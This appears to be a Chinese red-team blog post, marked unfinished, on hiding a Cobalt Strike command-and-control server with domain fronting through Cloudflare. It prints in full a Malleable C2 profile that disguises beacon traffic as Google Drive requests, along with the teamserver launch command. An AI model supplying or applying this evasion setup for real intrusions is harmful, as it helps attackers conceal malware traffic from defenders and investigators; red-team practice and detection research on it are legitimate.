title: C2隐藏-域前置
tags: 匿名
categories:

C2隐藏之域名前置(未完待续)

前言

在进行红队测试中,如果没对自己的C2服务器做一定的保护,在做命令控制时,在受害机器产生与C2服务器通信的网络连接,那么就很容易被溯源到真实ip,同时C2服务器也暴露了,也就很难进行下一步动作。

域前置

域前置(英语:Domain fronting),又译为域名幌子,是一种隐藏连接真实端点来规避互联网审查的技术。在应用层上运作时,域前置使用户能通过HTTPS连接到被屏蔽的服务,而表面上像在与另一个完全不同的站点通信。

域前置”技术是一种审查规避技术,主要用于隐蔽通信中的远程端点。“域前置”发生在应用层,主要适用了HTTPS协议进行通信,通信中的远程端点原本是被禁止的,通过使用“域前置”技术,让检测器误认为是一个其他的合法地址,进而绕过检测。核心思想是在不同的通信层使用了不一样的域名。在一个HTTPS请求中,通信外层使用了一个域名:DNS请求和TLS SNI (Server Name Indication);而在通信内层,则使用了另一个域名:HTTP Host Header,这个域名由于在HTTPS加密之下,所以对检测器而言是不可见的。
这里借用大佬的一张图
C2隐藏-域前置 - 图1
域前置技术可以高信誉度的域名进行前置,例如Google、Microsoft等,这里我只是简单实践一下

准备

  1. C2域名
  2. Cloudflare账号一枚

  3. C2服务器

    域名相关配置

  4. Godaddy购置一枚域名,并将NS服务器设置为Cloudflare的地址进行解析
    C2隐藏-域前置 - 图2

  5. Cloudflare设置对应的A记录
    C2隐藏-域前置 - 图3
  6. Cloudflare调整缓存配置
    关闭开发模式和缓存
    C2隐藏-域前置 - 图4
  7. 配置C2.profile
    这里有大佬harmj0y整理的集合

    https://github.com/rsmudge/Malleable-C2-Profiles 这里有个google profile参考

  1. #
  2. # Google Drive
  3. # 
  4. # Author: @bluscreenofjeff
  5. #
  6. #set https cert info
  7. https-certificate {
  8.     set CN       "*.google.com"; #Common Name
  9.     set O        "Google Inc"; #Organization Name
  10.     set C        "US"; #Country
  11.     set L        "Mountain View"; #Locality
  12.     set ST       "California"; #State or Province
  13.     set validity "365"; #Number of days the cert is valid for
  14. }
  15. #default Beacon sleep duration and jitter
  16. set sleeptime "60000";
  17. set jitter    "20";
  18. #default useragent for HTTP comms
  19. set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
  20. #IP address used to indicate no tasks are available to DNS Beacon
  21. set dns_idle "8.8.4.4";
  22. #Force a sleep prior to each individual DNS request. (in milliseconds)
  23. set dns_sleep "0";
  24. #Maximum length of hostname when uploading data over DNS (0-255)
  25. set maxdns    "235";
  26. http-get {
  27.     set uri "/viewerng/meta";
  28.     client {
  29.         header "Accept" "text/html,application/xml;*/*;";
  30.         header "Accept-Encoding" "gzip, deflate";
  31.         header "Host" "drive.google.com";
  32.         header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
  33.         #session metadata
  34.         metadata {
  35.             base64url;
  36.             netbios;
  37.             base64url;
  38.             parameter "id";
  39.         }
  40.         parameter "u" "0";
  41.     }
  42.     server {
  43.         header "Content-Type" "application/json; charset=utf-8";
  44.         header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
  45.         header "Pragma" "no-cache";
  46.         header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
  47.         header "X-Content-Type-Options" "nosniff";
  48.         header "X-Frame-Options" "SAMEORIGIN";
  49.         header "X-XSS-Protection" "1; mode=block";
  50.         header "Server" "GSE";
  51.         header "Connection" "close";
  52.         #Beacon's tasks
  53.         output {
  54.             print;
  55.         }
  56.     }
  57. }
  58. http-post {
  60.     set uri "/viewersng/meta";
  61.     set verb "GET";
  63.     client {
  64.         header "Accept" "text/html,application/xml;*/*;";
  65.         header "Accept-Encoding" "gzip, deflate";
  66.         header "Host" "drive.google.com";
  67.         header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
  68.         output {
  69.             base64url;
  70.             netbios;
  71.             base64url;
  72.             parameter "id";
  73.         }
  74.         #session ID
  75.         id {
  76.             parameter "u";
  77.         }
  78.     }
  79.     server {
  80.         header "Content-Type" "application/json; charset=utf-8";
  81.         header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
  82.         header "Pragma" "no-cache";
  83.         header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
  84.         header "X-Content-Type-Options" "nosniff";
  85.         header "X-Frame-Options" "SAMEORIGIN";
  86.         header "X-XSS-Protection" "1; mode=block";
  87.         header "Server" "GSE";
  88.         header "Connection" "close";
  89.         output {
  90.             print;
  91.         }
  92.     }
  93. }
  94. #change the stager server
  95. http-stager {
  96.     server {
  97.         header "Content-Type" "application/json; charset=utf-8";
  98.         header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
  99.         header "Pragma" "no-cache";
  100.     }
  101. }

需要注意的将profile文件中所有的域名替换为C2域名
C2隐藏-域前置 - 图5

C2配置

  1. 将修改好的C2.profile上传到Cobalstrike的根目录,启动命令后加./C2.profile
    如:

    1. ./teamserver C2ip Password ./C2.profile

  2. Cobalstrike设置listener
    C2隐藏-域前置 - 图6

    最终效果

    C2隐藏-域前置 - 图7
    C2隐藏-域前置 - 图8
    隐藏成功